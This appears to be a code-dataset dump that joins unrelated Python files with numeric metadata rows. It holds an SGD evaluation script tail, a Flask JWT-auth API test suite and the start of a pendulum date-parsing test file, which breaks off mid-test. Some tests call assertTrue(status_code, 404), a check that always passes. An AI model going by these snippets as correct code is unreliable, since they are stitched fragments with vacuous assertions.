print('Evaluating Quantized CS SGD without feedback, all H...')
fname = os.path.join(output_folder, 'qcssgd_nfa.mat')
evaluate_qcssgd(T, Wopt, file_name=fname, H=H, feedback=False, beta=0)
# print('_' * 40)
# print('Evaluating Quantized CS SGD with feedback, all H...')
# fname = os.path.join(output_folder, 'qcssgd_wfa.mat')
# evaluate_qcssgd(T, Wopt, file_name=fname, H=H, feedback=True, beta=0.5)
# print('_' * 40)
# print('Evaluating Quantized CS SGD without feedback, partial H...')
# fname = os.path.join(output_folder, 'qcssgd_nf{}.mat'.format(k))
# evaluate_qcssgd(T, Wopt, file_name=fname, H=Hk, feedback=False, beta=0)
# print('_' * 40)
# print('Evaluating Quantized CS SGD with feedback, partial H...')
# fname = os.path.join(output_folder, 'qcssgd_wf{}.mat'.format(k))
# evaluate_qcssgd(T, Wopt, file_name=fname, H=Hk, feedback=True, beta=0.2)
# print('_' * 40)
# print('Evaluating Dithered Quantized Transformed SGD...')
# fname = os.path.join(output_folder, 'dtqsgd.mat')
# evaluate_dtqsgd(T, Wopt, file_name=fname, H=H)
# import seaborns as sns
# ax = sns.tsplot(time="timepoint", value="BOLD signal",
# unit="subject", condition="ROI",
# data=...)
if __name__ == '__main__':
compare_algorithms()
| 35.10452
| 106
| 0.550978
| 1,586
| 12,427
| 4.153846
| 0.120429
| 0.038251
| 0.021858
| 0.032787
| 0.82119
| 0.814967
| 0.76867
| 0.756527
| 0.72799
| 0.714936
| 0
| 0.025
| 0.307958
| 12,427
| 353
| 107
| 35.203966
| 0.741047
| 0.151364
| 0
| 0.770563
| 0
| 0
| 0.080571
| 0.002952
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030303
| false
| 0
| 0.025974
| 0
| 0.056277
| 0.168831
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc7af6f3c6d2b7ed6498a3f3da679c6da443b456
| 24,863
|
py
|
Python
|
services/machine_learning/project/tests/test_ml_api.py
|
geraldomacias/MarkLogic
|
996c48a970a24aa7e5af4752fe9c12b63d4834fe
|
[
"BSD-2-Clause"
] | 5
|
2018-12-03T18:08:34.000Z
|
2019-03-13T05:59:07.000Z
|
services/machine_learning/project/tests/test_ml_api.py
|
geraldomacias/MarkLogic
|
996c48a970a24aa7e5af4752fe9c12b63d4834fe
|
[
"BSD-2-Clause"
] | 7
|
2018-12-03T23:11:14.000Z
|
2019-06-06T06:00:39.000Z
|
services/machine_learning/project/tests/test_ml_api.py
|
geraldomacias/MarkLogic
|
996c48a970a24aa7e5af4752fe9c12b63d4834fe
|
[
"BSD-2-Clause"
] | 1
|
2019-04-11T16:34:55.000Z
|
2019-04-11T16:34:55.000Z
|
"""
Copyright 2019 Team Mark
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# services/machine_learning/project/tests/test_ml_api.py
import json
import unittest
import time
import datetime
import jwt
from project import db
from project.api.models import BlacklistToken, MLStatus, decode_auth_token
from project.tests.base import BaseTestCase
from flask import current_app
def encode_auth_token(user_id):
"""
Generates the Auth Token (for testing only)
returns a string
"""
try:
payload = {
'exp': datetime.datetime.utcnow() + datetime.timedelta(days=0, seconds=5),
'iat': datetime.datetime.utcnow(),
'sub': user_id
}
return jwt.encode(
payload,
current_app.config.get('SECRET_KEY'),
algorithm='HS256'
)
except Exception as e:
return e
class TestJWT(BaseTestCase):
"""Tests to ensure encoding / decoding JWT works."""
def test_encode_auth_token(self):
"""Ensure auth tokens are encoded correctly."""
auth_token = encode_auth_token(1)
self.assertTrue(isinstance(auth_token, bytes))
def test_decode_auth_token(self):
"""Ensure auth tokens are decoded correctly."""
auth_token = encode_auth_token(1)
self.assertTrue(isinstance(auth_token, bytes))
self.assertTrue(decode_auth_token(auth_token.decode("utf-8")) == 1)
class TestStartML(BaseTestCase):
"""Tests to ensure starting the ML component works."""
def test_startml_no_auth(self):
"""Test for starting ml with no provided token"""
with self.client:
response = self.client.post(
'/ml/start'
)
data=json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Provide a valid auth token.')
self.assertEqual(response.status_code, 401)
def test_startml_malformed_bearer(self):
"""Test for starting ml with malformed bearer token."""
with self.client:
auth_token = encode_auth_token(1)
response = self.client.post(
'/ml/start',
headers=dict(
Authorization='Bearer' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Bearer token malformed.')
self.assertEqual(response.status_code, 401)
def test_startml_blacklisted_token(self):
"""Test for starting ml with a blacklisted token."""
with self.client:
auth_token = encode_auth_token(1)
# Blacklist a valid token
blacklist_token = BlacklistToken(auth_token.decode())
db.session.add(blacklist_token)
db.session.commit()
# blacklisted token request
response = self.client.post(
'/ml/start',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Token blacklisted. Please log in again.')
self.assertEqual(response.status_code, 401)
def test_startml_expired_token(self):
"""Test for starting ml with an expired token."""
with self.client:
auth_token = encode_auth_token(1)
# wait for token to be invalidated
time.sleep(6)
response = self.client.post(
'/ml/start',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Signature expired. Please log in again.')
self.assertEqual(response.status_code, 401)
def test_startml_no_files(self):
"""Test for starting ml with no provided files."""
with self.client:
auth_token = encode_auth_token(1)
response = self.client.post(
'/ml/start',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'No files provided.')
self.assertEqual(response.status_code, 400)
def test_startml_empty_file_list(self):
"""Test for starting ml with an empty file list."""
with self.client:
auth_token = encode_auth_token(1)
response = self.client.post(
'/ml/start',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
),
data=json.dumps(dict(
files=[]
)),
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'No files provided.')
self.assertEqual(response.status_code, 400)
def test_startml_no_status(self):
"""Test for starting ml with no status in status db."""
with self.client:
auth_token = encode_auth_token(1)
response = self.client.post(
'/ml/start',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
),
data=json.dumps(dict(
files=['file_1', 'file_2']
)),
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'success')
self.assertTrue(data['message'] == 'Successfully started ML on 2 files.')
self.assertEqual(response.status_code, 200)
def test_startml_bad_status(self):
"""Test for starting ml with status that isn't 'Waiting for files.'"""
with self.client:
auth_token = encode_auth_token(1)
# set user status in db
status = MLStatus(1, "Processing.")
db.session.add(status)
db.session.commit()
# request
response = self.client.post(
'/ml/start',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
),
data=json.dumps(dict(
files=['file_1', 'file_2']
)),
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Already processing files for this user.')
self.assertEqual(response.status_code, 401)
def test_startml(self):
"""Test for starting ml with correct status."""
with self.client:
auth_token = encode_auth_token(1)
# set user status in db
status = MLStatus(1, "Waiting for files.")
db.session.add(status)
db.session.commit()
# request
response = self.client.post(
'/ml/start',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
),
data=json.dumps(dict(
files=['file_1', 'file_2']
)),
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'success')
self.assertTrue(data['message'] == 'Successfully started ML on 2 files.')
self.assertEqual(response.status_code, 200)
class TestStatusML(BaseTestCase):
"""Tests to ensure ML Status works."""
def test_statustml_no_auth(self):
"""Test for ml status with no provided token"""
with self.client:
response = self.client.get(
'/ml/status'
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Provide a valid auth token.')
self.assertEqual(response.status_code, 401)
def test_statusml_malformed_bearer(self):
"""Test for ml status with malformed bearer token."""
with self.client:
auth_token = encode_auth_token(1)
response = self.client.get(
'/ml/status',
headers=dict(
Authorization='Bearer' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Bearer token malformed.')
self.assertEqual(response.status_code, 401)
def test_statusml_blacklisted_token(self):
"""Test for ml status with a blacklisted token."""
with self.client:
auth_token = encode_auth_token(1)
# Blacklist a valid token
blacklist_token = BlacklistToken(auth_token.decode())
db.session.add(blacklist_token)
db.session.commit()
# blacklisted token request
response = self.client.get(
'/ml/status',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Token blacklisted. Please log in again.')
self.assertEqual(response.status_code, 401)
def test_statusml_expired_token(self):
"""Test for ml status with an expired token."""
with self.client:
auth_token = encode_auth_token(1)
# wait for token to be invalidated
time.sleep(6)
response = self.client.get(
'/ml/status',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Signature expired. Please log in again.')
self.assertEqual(response.status_code, 401)
def test_statusml_no_status(self):
"""Test for ml status with no previous status."""
with self.client:
auth_token = encode_auth_token(1)
response = self.client.get(
'/ml/status',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'success')
self.assertTrue(data['message'] == 'Waiting for files.')
self.assertEqual(response.status_code, 200)
def test_statusml(self):
"""Test for ml status."""
with self.client:
auth_token = encode_auth_token(1)
# insert ml status
status = MLStatus(1, "Processing.")
db.session.add(status)
db.session.commit()
# request
response = self.client.get(
'/ml/status',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'success')
self.assertTrue(data['message'] == 'Processing.')
self.assertEqual(response.status_code, 200)
class TestGetClassified(BaseTestCase):
"""Tests to ensure getting classifed JSON workds."""
def test_getclassified_no_auth(self):
"""Test for getting classified json with no provided token"""
with self.client:
response = self.client.get(
'/ml/classified'
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Provide a valid auth token.')
self.assertEqual(response.status_code, 401)
def test_getclassified_malformed_bearer(self):
"""Test for getting classified json with malformed bearer token."""
with self.client:
auth_token = encode_auth_token(1)
response = self.client.get(
'/ml/classified',
headers=dict(
Authorization='Bearer' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Bearer token malformed.')
self.assertEqual(response.status_code, 401)
def test_getclassified_blacklisted_token(self):
"""Test for getting classified json with blacklisted token."""
with self.client:
auth_token = encode_auth_token(1)
# Blacklist a valid token
blacklist_token = BlacklistToken(auth_token.decode())
db.session.add(blacklist_token)
db.session.commit()
# blacklisted token request
response = self.client.get(
'/ml/classified',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Token blacklisted. Please log in again.')
self.assertEqual(response.status_code, 401)
def test_getclassified_expired_token(self):
"""Test for getting classified json with expired token."""
with self.client:
auth_token = encode_auth_token(1)
# wait for token to be invalidated
time.sleep(6)
response = self.client.get(
'ml/classified',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Signature expired. Please log in again.')
self.assertEqual(response.status_code, 401)
def test_getclassified_no_status(self):
"""Test for getting classified json with no previous status."""
with self.client:
auth_token = encode_auth_token(1)
response = self.client.get(
'ml/classified',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'User has not classified any data.')
self.assertTrue(response.status_code, 404)
def test_getclassified_wrong_status(self):
"""Test for getting classified json with status other than 'Completed.'"""
with self.client:
auth_token = encode_auth_token(1)
# insert ml status
status = MLStatus(1, "Processing.")
db.session.add(status)
db.session.commit()
# request
response = self.client.get(
'/ml/classified',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Classification not yet completed for given user. Current status: Processing.')
self.assertEqual(response.status_code, 401)
def test_getclassified_no_json(self):
"""Test for getting classified json with no json in db."""
with self.client:
auth_token = encode_auth_token(1)
# insert ml status
status = MLStatus(1, "Completed.")
db.session.add(status)
db.session.commit()
# request
response = self.client.get(
'/ml/classified',
headers=dict(
Authorization='bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'No classified data found for given user.')
self.assertEqual(response.status_code, 404)
def test_getclassified(self):
"""Test for getting classified json."""
with self.client:
auth_token = encode_auth_token(1)
# insert ml status
status = MLStatus(1, "Completed.")
status.classified_json = {
'omg': '123'
}
db.session.add(status)
db.session.commit()
# request
response = self.client.get(
'/ml/classified',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
json_data = data['data']
self.assertTrue(data['status'] == 'success')
self.assertTrue(data['message'] == 'Returning classified information.')
self.assertTrue(json_data['omg'] == '123')
self.assertEqual(response.status_code, 200)
class TestGetPastClassifiedAsJson(BaseTestCase):
"""Tests to ensure getting past classifications as json works."""
def test_getpastclassifiedasjson_no_auth(self):
"""Test for getting past classified json with no provided token"""
with self.client:
response = self.client.post(
'/ml/past_classified_json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Provide a valid auth token.')
self.assertEqual(response.status_code, 401)
def test_getpastclassifiedasjson_malformed_bearer(self):
"""Test for getting past classified json with malformed bearer token."""
with self.client:
auth_token = encode_auth_token(1)
response = self.client.post(
'/ml/past_classified_json',
headers=dict(
Authorization='Bearer' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Bearer token malformed.')
self.assertEqual(response.status_code, 401)
def test_getpastclassifiedasjson_blacklisted_token(self):
"""Test for getting past classified json with blacklisted token."""
with self.client:
auth_token = encode_auth_token(1)
# Blacklist a valid token
blacklist_token = BlacklistToken(auth_token.decode())
db.session.add(blacklist_token)
db.session.commit()
# blacklisted token request
response = self.client.post(
'/ml/past_classified_json',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Token blacklisted. Please log in again.')
self.assertEqual(response.status_code, 401)
def test_getpastclassifiedasjson_expired_token(self):
"""Test for getting past classified json with expired token."""
with self.client:
auth_token = encode_auth_token(1)
# wait for token to be invalidated
time.sleep(6)
response = self.client.post(
'/ml/past_classified_json',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Signature expired. Please log in again.')
self.assertEqual(response.status_code, 401)
def test_getpastclassifiedasjson_no_files(self):
"""Test for getting past classified json with no json data provided."""
with self.client:
auth_token = encode_auth_token(1)
response = self.client.post(
'/ml/past_classified_json',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'File name not provided.')
self.assertTrue(response.status_code, 400)
def test_getpastclassifiedasjson_bad_filename(self):
"""Test for getting past classified json with no 'file_name' key provided."""
with self.client:
auth_token = encode_auth_token(1)
response = self.client.post(
'/ml/past_classified_json',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
),
data=json.dumps(dict(
test='bad'
)),
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'File name not provided.')
self.assertEqual(response.status_code, 400)
def test_getpastclassifiedasjson_bad_download_url(self):
"""Test for getting past classified json with bad generated url."""
with self.client:
auth_token = encode_auth_token(1)
response = self.client.post(
'/ml/past_classified_json',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
),
data=json.dumps(dict(
file_name='bad_download_code'
)),
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Bad response from download url. Please try downloading again, or classify your csv again.')
self.assertEqual(response.status_code, 404)
def test_getpastclassifiedasjson(self):
"""Test for getting past classified json."""
with self.client:
auth_token = encode_auth_token(1)
response = self.client.post(
'/ml/past_classified_json',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
),
data=json.dumps(dict(
file_name='test'
)),
content_type='application/json'
)
data = json.loads(response.data.decode())
json_data = data['data']
self.assertTrue(data['status'] == 'success')
self.assertTrue(data['message'] == 'Returning classified information.')
self.assertTrue(json_data['test_data'] == 123)
self.assertEqual(response.status_code, 200)
| 40.362013
| 139
| 0.557214
| 2,525
| 24,863
| 5.365149
| 0.093861
| 0.067764
| 0.08238
| 0.048055
| 0.861519
| 0.846903
| 0.831402
| 0.793607
| 0.756551
| 0.726582
| 0
| 0.009908
| 0.334232
| 24,863
| 616
| 140
| 40.362013
| 0.808494
| 0.123919
| 0
| 0.720978
| 0
| 0
| 0.116517
| 0.008913
| 0
| 0
| 0
| 0
| 0.199593
| 1
| 0.069246
| false
| 0
| 0.01833
| 0
| 0.101833
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bcd7a53edb9f53dac895c3bd2a3fd5107b408282
| 15,535
|
py
|
Python
|
tests/parsing/test_parsing.py
|
seandstewart/pendulum
|
daa4b936daf3f4dfa7d211aa0ac1e9d82d5401d4
|
[
"MIT"
] | 5,049
|
2016-07-04T07:16:34.000Z
|
2022-03-31T07:41:48.000Z
|
tests/parsing/test_parsing.py
|
seandstewart/pendulum
|
daa4b936daf3f4dfa7d211aa0ac1e9d82d5401d4
|
[
"MIT"
] | 536
|
2016-07-05T22:46:29.000Z
|
2022-03-22T12:41:54.000Z
|
tests/parsing/test_parsing.py
|
seandstewart/pendulum
|
daa4b936daf3f4dfa7d211aa0ac1e9d82d5401d4
|
[
"MIT"
] | 373
|
2016-07-05T19:51:51.000Z
|
2022-03-23T16:57:46.000Z
|
import datetime
import pendulum
import pytest
from pendulum.parsing import ParserError
from pendulum.parsing import parse
def test_y():
text = "2016"
parsed = parse(text)
assert 2016 == parsed.year
assert 1 == parsed.month
assert 1 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
def test_ym():
text = "2016-10"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 1 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
def test_ymd():
text = "2016-10-06"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 6 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
def test_ymd_one_character():
text = "2016-2-6"
parsed = parse(text, strict=False)
assert 2016 == parsed.year
assert 2 == parsed.month
assert 6 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
def test_ymd_hms():
text = "2016-10-06 12:34:56"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 6 == parsed.day
assert 12 == parsed.hour
assert 34 == parsed.minute
assert 56 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2016-10-06 12:34:56.123456"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 6 == parsed.day
assert 12 == parsed.hour
assert 34 == parsed.minute
assert 56 == parsed.second
assert 123456 == parsed.microsecond
assert parsed.tzinfo is None
def test_rfc_3339():
text = "2016-10-06T12:34:56+05:30"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 6 == parsed.day
assert 12 == parsed.hour
assert 34 == parsed.minute
assert 56 == parsed.second
assert 0 == parsed.microsecond
assert 19800 == parsed.utcoffset().total_seconds()
def test_rfc_3339_extended():
text = "2016-10-06T12:34:56.123456+05:30"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 6 == parsed.day
assert 12 == parsed.hour
assert 34 == parsed.minute
assert 56 == parsed.second
assert 123456 == parsed.microsecond
assert 19800 == parsed.utcoffset().total_seconds()
text = "2016-10-06T12:34:56.000123+05:30"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 6 == parsed.day
assert 12 == parsed.hour
assert 34 == parsed.minute
assert 56 == parsed.second
assert 123 == parsed.microsecond
assert 19800 == parsed.utcoffset().total_seconds()
def test_rfc_3339_extended_nanoseconds():
text = "2016-10-06T12:34:56.123456789+05:30"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 6 == parsed.day
assert 12 == parsed.hour
assert 34 == parsed.minute
assert 56 == parsed.second
assert 123456 == parsed.microsecond
assert 19800 == parsed.utcoffset().total_seconds()
def test_iso_8601_date():
text = "2012"
parsed = parse(text)
assert 2012 == parsed.year
assert 1 == parsed.month
assert 1 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2012-05-03"
parsed = parse(text)
assert 2012 == parsed.year
assert 5 == parsed.month
assert 3 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "20120503"
parsed = parse(text)
assert 2012 == parsed.year
assert 5 == parsed.month
assert 3 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2012-05"
parsed = parse(text)
assert 2012 == parsed.year
assert 5 == parsed.month
assert 1 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
def test_iso8601_datetime():
text = "2016-10-01T14"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 1 == parsed.day
assert 14 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2016-10-01T14:30"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 1 == parsed.day
assert 14 == parsed.hour
assert 30 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "20161001T14"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 1 == parsed.day
assert 14 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "20161001T1430"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 1 == parsed.day
assert 14 == parsed.hour
assert 30 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "20161001T1430+0530"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 1 == parsed.day
assert 14 == parsed.hour
assert 30 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert 19800 == parsed.utcoffset().total_seconds()
text = "20161001T1430,4+0530"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 1 == parsed.day
assert 14 == parsed.hour
assert 30 == parsed.minute
assert 0 == parsed.second
assert 400000 == parsed.microsecond
assert 19800 == parsed.utcoffset().total_seconds()
text = "2008-09-03T20:56:35.450686+01"
parsed = parse(text)
assert 2008 == parsed.year
assert 9 == parsed.month
assert 3 == parsed.day
assert 20 == parsed.hour
assert 56 == parsed.minute
assert 35 == parsed.second
assert 450686 == parsed.microsecond
assert 3600 == parsed.utcoffset().total_seconds()
def test_iso8601_week_number():
text = "2012-W05"
parsed = parse(text)
assert 2012 == parsed.year
assert 1 == parsed.month
assert 30 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2012W05"
parsed = parse(text)
assert 2012 == parsed.year
assert 1 == parsed.month
assert 30 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
# Long Year
text = "2015W53"
parsed = parse(text)
assert 2015 == parsed.year
assert 12 == parsed.month
assert 28 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2012-W05-5"
parsed = parse(text)
assert 2012 == parsed.year
assert 2 == parsed.month
assert 3 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2012W055"
parsed = parse(text)
assert 2012 == parsed.year
assert 2 == parsed.month
assert 3 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2009-W53-7"
parsed = parse(text)
assert 2010 == parsed.year
assert 1 == parsed.month
assert 3 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2009-W01-1"
parsed = parse(text)
assert 2008 == parsed.year
assert 12 == parsed.month
assert 29 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
def test_iso8601_week_number_with_time():
text = "2012-W05T09"
parsed = parse(text)
assert 2012 == parsed.year
assert 1 == parsed.month
assert 30 == parsed.day
assert 9 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2012W05T09"
parsed = parse(text)
assert 2012 == parsed.year
assert 1 == parsed.month
assert 30 == parsed.day
assert 9 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2012-W05-5T09"
parsed = parse(text)
assert 2012 == parsed.year
assert 2 == parsed.month
assert 3 == parsed.day
assert 9 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2012W055T09"
parsed = parse(text)
assert 2012 == parsed.year
assert 2 == parsed.month
assert 3 == parsed.day
assert 9 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
def test_iso8601_ordinal():
text = "2012-007"
parsed = parse(text)
assert 2012 == parsed.year
assert 1 == parsed.month
assert 7 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2012007"
parsed = parse(text)
assert 2012 == parsed.year
assert 1 == parsed.month
assert 7 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
def test_iso8601_time():
now = pendulum.datetime(2015, 11, 12)
text = "201205"
parsed = parse(text, now=now)
assert 2015 == parsed.year
assert 11 == parsed.month
assert 12 == parsed.day
assert 20 == parsed.hour
assert 12 == parsed.minute
assert 5 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "20:12:05"
parsed = parse(text, now=now)
assert 2015 == parsed.year
assert 11 == parsed.month
assert 12 == parsed.day
assert 20 == parsed.hour
assert 12 == parsed.minute
assert 5 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "20:12:05.123456"
parsed = parse(text, now=now)
assert 2015 == parsed.year
assert 11 == parsed.month
assert 12 == parsed.day
assert 20 == parsed.hour
assert 12 == parsed.minute
assert 5 == parsed.second
assert 123456 == parsed.microsecond
assert parsed.tzinfo is None
def test_iso8601_ordinal_invalid():
text = "2012-007-05"
with pytest.raises(ParserError):
parse(text)
def test_exact():
text = "2012"
parsed = parse(text, exact=True)
assert isinstance(parsed, datetime.date)
assert 2012 == parsed.year
assert 1 == parsed.month
assert 1 == parsed.day
text = "2012-03"
parsed = parse(text, exact=True)
assert isinstance(parsed, datetime.date)
assert 2012 == parsed.year
